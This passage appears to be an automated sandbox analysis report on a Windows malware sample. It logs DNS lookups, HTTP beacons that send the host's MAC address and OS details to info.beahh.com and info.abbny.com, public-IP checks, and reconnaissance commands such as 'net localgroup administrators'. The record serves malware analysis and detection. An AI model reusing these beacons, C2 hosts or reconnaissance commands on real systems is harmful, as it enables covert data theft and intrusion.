Apr 5, 2021 11:24:53.295975924 CEST | 192.168.2.3 | 8.8.8.8 | 0x30c0 | Standard query (0) | info.abbny.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:53.783639908 CEST | 192.168.2.3 | 8.8.8.8 | 0x25a6 | Standard query (0) | info.ackng.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:54.862765074 CEST | 192.168.2.3 | 8.8.8.8 | 0xe70e | Standard query (0) | info.beahh.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:55.272763968 CEST | 192.168.2.3 | 8.8.8.8 | 0x179f | Standard query (0) | info.abbny.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:55.869951963 CEST | 192.168.2.3 | 8.8.8.8 | 0x33a | Standard query (0) | info.ackng.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:58.338210106 CEST | 192.168.2.3 | 8.8.8.8 | 0x7bb5 | Standard query (0) | info.beahh.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:58.716615915 CEST | 192.168.2.3 | 8.8.8.8 | 0x45ce | Standard query (0) | info.abbny.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:59.292834997 CEST | 192.168.2.3 | 8.8.8.8 | 0x1e7 | Standard query (0) | info.ackng.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:00.380858898 CEST | 192.168.2.3 | 8.8.8.8 | 0xeb28 | Standard query (0) | info.beahh.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:01.243465900 CEST | 192.168.2.3 | 8.8.8.8 | 0xc779 | Standard query (0) | info.abbny.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:01.757683039 CEST | 192.168.2.3 | 8.8.8.8 | 0x734b | Standard query (0) | info.ackng.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:03.063101053 CEST | 192.168.2.3 | 8.8.8.8 | 0x4c51 | Standard query (0) | info.beahh.com | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:04.465533972 CEST | 192.168.2.3 | 8.8.8.8 | 0x209a | Standard query (0) | info.abbny.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 5, 2021 11:24:49.428086996 CEST | 8.8.8.8 | 192.168.2.3 | 0xc6cd | No error (0) | info.ackng.com |  | 127.0.0.1 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:50.480840921 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd26 | No error (0) | ip.42.pl | 42.pl |  | CNAME (Canonical name) | IN (0x0001)
Apr 5, 2021 11:24:50.480840921 CEST | 8.8.8.8 | 192.168.2.3 | 0xcd26 | No error (0) | 42.pl |  | 79.98.145.42 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:50.660466909 CEST | 8.8.8.8 | 192.168.2.3 | 0xc903 | No error (0) | info.beahh.com | beahh.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 5, 2021 11:24:50.660466909 CEST | 8.8.8.8 | 192.168.2.3 | 0xc903 | No error (0) | beahh.com |  | 72.52.178.23 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:50.722232103 CEST | 8.8.8.8 | 192.168.2.3 | 0xbc17 | No error (0) | jsonip.com |  | 45.79.77.20 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:51.069844961 CEST | 8.8.8.8 | 192.168.2.3 | 0xc1e5 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Apr 5, 2021 11:24:51.119930029 CEST | 8.8.8.8 | 192.168.2.3 | 0x6932 | No error (0) | info.abbny.com |  | 173.231.189.15 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:51.183566093 CEST | 8.8.8.8 | 192.168.2.3 | 0xa295 | No error (0) | jsonip.com |  | 45.79.77.20 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:51.738825083 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2f3 | No error (0) | info.ackng.com |  | 127.0.0.1 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:52.966620922 CEST | 8.8.8.8 | 192.168.2.3 | 0x81df | No error (0) | info.beahh.com | beahh.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 5, 2021 11:24:52.966620922 CEST | 8.8.8.8 | 192.168.2.3 | 0x81df | No error (0) | beahh.com |  | 72.52.178.23 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:53.350553989 CEST | 8.8.8.8 | 192.168.2.3 | 0x30c0 | No error (0) | info.abbny.com |  | 173.231.189.15 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:53.842984915 CEST | 8.8.8.8 | 192.168.2.3 | 0x25a6 | No error (0) | info.ackng.com |  | 127.0.0.1 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:54.935036898 CEST | 8.8.8.8 | 192.168.2.3 | 0xe70e | No error (0) | info.beahh.com | beahh.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 5, 2021 11:24:54.935036898 CEST | 8.8.8.8 | 192.168.2.3 | 0xe70e | No error (0) | beahh.com |  | 72.52.178.23 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:55.418486118 CEST | 8.8.8.8 | 192.168.2.3 | 0x179f | No error (0) | info.abbny.com |  | 173.231.189.15 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:55.921319008 CEST | 8.8.8.8 | 192.168.2.3 | 0x33a | No error (0) | info.ackng.com |  | 127.0.0.1 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:58.392496109 CEST | 8.8.8.8 | 192.168.2.3 | 0x7bb5 | No error (0) | info.beahh.com | beahh.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 5, 2021 11:24:58.392496109 CEST | 8.8.8.8 | 192.168.2.3 | 0x7bb5 | No error (0) | beahh.com |  | 72.52.178.23 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:58.770958900 CEST | 8.8.8.8 | 192.168.2.3 | 0x45ce | No error (0) | info.abbny.com |  | 173.231.189.15 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:24:59.349452972 CEST | 8.8.8.8 | 192.168.2.3 | 0x1e7 | No error (0) | info.ackng.com |  | 127.0.0.1 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:00.541034937 CEST | 8.8.8.8 | 192.168.2.3 | 0xeb28 | No error (0) | info.beahh.com | beahh.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 5, 2021 11:25:00.541034937 CEST | 8.8.8.8 | 192.168.2.3 | 0xeb28 | No error (0) | beahh.com |  | 72.52.178.23 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:01.300173998 CEST | 8.8.8.8 | 192.168.2.3 | 0xc779 | No error (0) | info.abbny.com |  | 173.231.189.15 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:01.813628912 CEST | 8.8.8.8 | 192.168.2.3 | 0x734b | No error (0) | info.ackng.com |  | 127.0.0.1 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:03.117399931 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c51 | No error (0) | info.beahh.com | beahh.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 5, 2021 11:25:03.117399931 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c51 | No error (0) | beahh.com |  | 72.52.178.23 | A (IP address) | IN (0x0001)
Apr 5, 2021 11:25:04.514276981 CEST | 8.8.8.8 | 192.168.2.3 | 0x209a | No error (0) | info.abbny.com |  | 173.231.189.15 | A (IP address) | IN (0x0001)
• ip.42.pl
• info.beahh.com
• jsonip.com
• info.abbny.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49742 | 79.98.145.42 | 80 | C:\Users\user\Desktop\UlJpFEz1Cj.exe
Timestamp | kBytes transferred | Direction | Data
Apr 5, 2021 11:24:50.548393011 CEST | 3110 | OUT | GET /raw HTTP/1.1
    Accept-Encoding: identity
    Host: ip.42.pl
    Connection: close
    User-Agent: Python-urllib/2.7
Apr 5, 2021 11:24:50.614840031 CEST | 3111 | IN | HTTP/1.1 200 OK
    Date: Mon, 05 Apr 2021 09:24:50 GMT
    Server: Apache/2.4.29 (FreeBSD) OpenSSL/1.0.2k-freebsd PHP/5.6.32
    X-Powered-By: PHP/5.6.32
    Content-Length: 11
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 39
    Data Ascii: 84.17.52.79


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49743 | 72.52.178.23 | 80 | C:\Users\user\Desktop\UlJpFEz1Cj.exe
Timestamp | kBytes transferred | Direction | Data
Apr 5, 2021 11:24:50.817348957 CEST | 3112 | OUT | GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
    Accept-Encoding: identity
    Host: info.beahh.com
    Connection: close
    User-Agent: Python-urllib/2.7


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 51350 | 72.52.178.23 | 80 | C:\Users\user\Desktop\UlJpFEz1Cj.exe
Timestamp | kBytes transferred | Direction | Data
Apr 5, 2021 11:25:00.785959959 CEST | 6778 | OUT | GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
    Accept-Encoding: identity
    Host: info.beahh.com
    Connection: close
    User-Agent: Python-urllib/2.7


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 51384 | 173.231.189.15 | 80 | C:\Users\user\Desktop\UlJpFEz1Cj.exe
Timestamp | kBytes transferred | Direction | Data
Apr 5, 2021 11:25:01.451046944 CEST | 6779 | OUT | GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
    Accept-Encoding: identity
    Host: info.abbny.com
    Connection: close
    User-Agent: Python-urllib/2.7
Apr 5, 2021 11:25:01.581716061 CEST | 6780 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 05 Apr 2021 09:25:01 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=b638e90736388123bcf7dccf21bb52a5|84.17.52.79|1617614701|1617614701|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 51772 | 72.52.178.23 | 80 | C:\Users\user\Desktop\UlJpFEz1Cj.exe
Timestamp | kBytes transferred | Direction | Data
Apr 5, 2021 11:25:03.288067102 CEST | 7600 | OUT | GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
    Accept-Encoding: identity
    Host: info.beahh.com
    Connection: close
    User-Agent: Python-urllib/2.7


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 51981 | 173.231.189.15 | 80 | C:\Users\user\Desktop\UlJpFEz1Cj.exe
Timestamp | kBytes transferred | Direction | Data
Apr 5, 2021 11:25:04.690469027 CEST | 7609 | OUT | GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
    Accept-Encoding: identity
    Host: info.abbny.com
    Connection: close
    User-Agent: Python-urllib/2.7
Apr 5, 2021 11:25:04.868447065 CEST | 7611 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 05 Apr 2021 09:25:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=898608164d1d63004d24452166cd9834|84.17.52.79|1617614704|1617614704|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49744 | 45.79.77.20 | 80 | C:\Users\user\Desktop\UlJpFEz1Cj.exe
Timestamp | kBytes transferred | Direction | Data
Apr 5, 2021 11:24:50.930787086 CEST | 3112 | OUT | GET / HTTP/1.1
    Accept-Encoding: identity
    Host: jsonip.com
    Connection: close
    User-Agent: Python-urllib/2.7
Apr 5, 2021 11:24:51.124084949 CEST | 3114 | IN | HTTP/1.1 301 Moved Permanently
    Server: nginx/1.16.1
    Date: Mon, 05 Apr 2021 09:24:51 GMT
    Content-Type: text/html
    Content-Length: 169
    Connection: close
    Location: https://jsonip.com/
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID: 3
Source IP: 192.168.2.3
Source Port: 49746
Destination IP: 173.231.189.15
Destination Port: 80
Process: C:\Users\user\Desktop\UlJpFEz1Cj.exe

Timestamp: Apr 5, 2021 11:24:51.279850006 CEST
kBytes transferred: 3574
Direction: OUT
Data: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.abbny.com
Connection: close
User-Agent: Python-urllib/2.7

Timestamp: Apr 5, 2021 11:24:51.420372963 CEST
kBytes transferred: 3576
Direction: IN
Data: HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:24:51 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=3a3d5f276c84172fefb240b1dc451ddf|84.17.52.79|1617614691|1617614691|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.3
Source Port: 49881
Destination IP: 72.52.178.23
Destination Port: 80
Process: C:\Users\user\Desktop\UlJpFEz1Cj.exe

Timestamp: Apr 5, 2021 11:24:53.128603935 CEST
kBytes transferred: 3605
Direction: OUT
Data: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.beahh.com
Connection: close
User-Agent: Python-urllib/2.7


Session ID: 5
Source IP: 192.168.2.3
Source Port: 50005
Destination IP: 173.231.189.15
Destination Port: 80
Process: C:\Users\user\Desktop\UlJpFEz1Cj.exe

Timestamp: Apr 5, 2021 11:24:53.487926006 CEST
kBytes transferred: 4112
Direction: OUT
Data: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.abbny.com
Connection: close
User-Agent: Python-urllib/2.7

Timestamp: Apr 5, 2021 11:24:53.637577057 CEST
kBytes transferred: 4665
Direction: IN
Data: HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:24:53 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=6f0fc984103f8290cdb6ed3d48e277a9|84.17.52.79|1617614693|1617614693|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID: 6
Source IP: 192.168.2.3
Source Port: 50366
Destination IP: 72.52.178.23
Destination Port: 80
Process: C:\Users\user\Desktop\UlJpFEz1Cj.exe

Timestamp: Apr 5, 2021 11:24:55.111429930 CEST
kBytes transferred: 4682
Direction: OUT
Data: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.beahh.com
Connection: close
User-Agent: Python-urllib/2.7


Session ID: 7
Source IP: 192.168.2.3
Source Port: 50490
Destination IP: 173.231.189.15
Destination Port: 80
Process: C:\Users\user\Desktop\UlJpFEz1Cj.exe

Timestamp: Apr 5, 2021 11:24:55.574418068 CEST
kBytes transferred: 4683
Direction: OUT
Data: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.abbny.com
Connection: close
User-Agent: Python-urllib/2.7

Timestamp: Apr 5, 2021 11:24:55.709731102 CEST
kBytes transferred: 4687
Direction: IN
Data: HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:24:55 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=a83eefa89733bb5c9840a611619eaf1a|84.17.52.79|1617614695|1617614695|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID: 8
Source IP: 192.168.2.3
Source Port: 50919
Destination IP: 72.52.178.23
Destination Port: 80
Process: C:\Users\user\Desktop\UlJpFEz1Cj.exe

Timestamp: Apr 5, 2021 11:24:58.550501108 CEST
kBytes transferred: 6775
Direction: OUT
Data: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.beahh.com
Connection: close
User-Agent: Python-urllib/2.7


Session ID: 9
Source IP: 192.168.2.3
Source Port: 50993
Destination IP: 173.231.189.15
Destination Port: 80
Process: C:\Users\user\Desktop\UlJpFEz1Cj.exe

Timestamp: Apr 5, 2021 11:24:58.959186077 CEST
kBytes transferred: 6776
Direction: OUT
Data: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.abbny.com
Connection: close
User-Agent: Python-urllib/2.7

Timestamp: Apr 5, 2021 11:24:59.157944918 CEST
kBytes transferred: 6777
Direction: IN
Data: HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:24:59 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=97456ced88f34bb2cd4f798d649fe5f0|84.17.52.79|1617614699|1617614699|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Timestamp: Apr 5, 2021 11:24:52.150207043 CEST
Source IP: 45.79.77.20
Source Port: 443
Dest IP: 192.168.2.3
Dest Port: 49747
Subject: CN=jsonip.com
Issuer: CN=R3, O=Let's Encrypt, C=US
Not Before: Tue Feb 23 03:05:44 CET 2021
Not After: Mon May 24 04:05:44 CEST 2021
JA3 SSL Client Fingerprint:
JA3 SSL Client Digest:

Chain certificate (intermediate):
Subject: CN=R3, O=Let's Encrypt, C=US
Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co.
Not Before: Wed Oct 07 21:21:40 CEST 2020
Not After: Wed Sep 29 21:21:40 CEST 2021

                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior


                                                                  System Behavior

                                                                  Start time:11:22:56
                                                                  Start date:05/04/2021
                                                                  Path:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
                                                                  Imagebase:0x1180000
                                                                  File size:6967362 bytes
                                                                  MD5 hash:DDE978F310F46D0556EA774DA695B698
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Start time:11:22:57
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Start time:11:22:59
                                                                  Start date:05/04/2021
                                                                  Path:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
                                                                  Imagebase:0x1180000
                                                                  File size:6967362 bytes
                                                                  MD5 hash:DDE978F310F46D0556EA774DA695B698
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.203224359.0000000004464000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.203074202.000000000435C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  Reputation:low
                                                                  Start time:11:23:03
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c wmic ntdomain get domainname
                                                                  Imagebase:0xbd0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Start time:11:23:03
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:wmic ntdomain get domainname
                                                                  Imagebase:0x10c0000
                                                                  File size:391680 bytes
                                                                  MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Start time:11:23:04
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c net localgroup administrators
                                                                  Imagebase:0xbd0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Start time:11:23:05
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:net localgroup administrators
                                                                  Imagebase:0x1b0000
                                                                  File size:46592 bytes
                                                                  MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Start time:11:23:05
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                  Imagebase:0x1320000
                                                                  File size:141312 bytes
                                                                  MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
